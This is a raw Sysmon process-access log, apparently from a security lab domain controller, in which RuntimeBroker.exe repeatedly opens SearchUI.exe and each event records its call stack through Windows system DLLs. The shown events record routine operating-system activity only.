12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007608Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007607Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007606Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007605Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007604Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007603Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007602Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007601Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007600Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007599Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007598Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007597Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1528d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009 10341000x80000000000000007596Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000007595Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000007594Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11b6c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007593Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007592Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007591Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007590Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 